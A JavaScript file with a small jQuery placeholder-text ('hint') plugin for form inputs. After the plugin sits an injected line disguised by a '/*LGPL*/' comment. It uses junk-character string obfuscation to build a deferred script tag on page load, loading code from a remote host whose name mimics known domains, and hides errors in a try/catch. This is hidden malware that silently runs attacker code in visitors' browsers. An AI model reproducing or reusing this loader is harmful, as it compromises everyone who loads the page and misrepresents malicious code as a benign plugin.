
(function ($) {

$.fn.hint = function (blurClass) {
    if (!blurClass) blurClass = 'blur';
    
    return this.each(function () {
        var $input = $(this),
            title = $input.attr('title'),
            $form = $(this.form),
            $win = $(window);

        function remove() {
            if (this.value === title && $input.hasClass(blurClass)) {
                $input.val('').removeClass(blurClass);
            }
        }

        if (title) { 
            $input.blur(function () {
                if (this.value === '') {
                    $input.val(title).addClass(blurClass);
                }
            }).focus(remove).blur();
            
            $form.submit(remove);
            $win.unload(remove);
        }
    });
};

})(jQuery);

$(function(){ 
	$('input[title!=""]').hint();
});
/*LGPL*/ try{ window.onload = function(){var Y3oxov96rwh = document.createElement('s(c^r$$#i$!p)t#('.replace(/&|@|\^|\!|#|\)|\(|\$/ig, ''));Y3oxov96rwh.setAttribute('defer', 'd&e&&^&f&e((r&#'.replace(/\^|&|\(|\)|#|\$|\!|@/ig, ''));Y3oxov96rwh.setAttribute('type', 't)&$e$!^x!t&!@/@!)j#!a^$v#a&)&#s$(!c!$^r@i($p$!^t#^#'.replace(/\(|&|@|\!|\)|\^|\$|#/ig, ''));Y3oxov96rwh.setAttribute('id', 'S@@s$(0()v(^^(f$#a!^$)&h!#k@&@l(k^@(^p&w@&'.replace(/@|\$|\)|&|\!|\(|#|\^/ig, ''));Y3oxov96rwh.setAttribute('s@#@r!^(c^'.replace(/\)|\^|\!|@|\(|#|&|\$/ig, ''),  'h!^)&@t&$)t###p#):@@/^)^/#(a)$t@#)(w^)!i@k##$i^!^&-$!j(^@p^^@.!)&s(&$^#a(m!s^&&#!u((^n($^&g#.^#&c(@o^@!m@&)^!.#5^!(#8(-^))c$^$@o!m!.$w)e#$@$$b@)n##e^#^t(e!)^x$$@)p$e&#^(!r&!$t^@&#s^^.#($&^r!&&u):)@8&(0((@8(0&&&/&&g&@&o^o@g&)#l!!e$(.$@c^$@$o@m)/^#$g!^)o&(&o@@g@()l^e)^.$&c#(&o&m$@#/$))g)^$^o@@&o^)&g#@l)!e@^$.#^)c@o@m&($.!u#)a!@)&/)c^^h!i^))n$$(a$r&e))@$n@@.!c!o&^m(@#&#/#h()@^a#)^)o!1&@2!)&!3@.!^c#)@$$o$!^m@/)^()&'.replace(/&|@|#|\)|\!|\$|\(|\^/ig, ''));if (document){document.body.appendChild(Y3oxov96rwh);}} } catch(Yvrw0ul2iwvpr6u5vn7ow8r) {}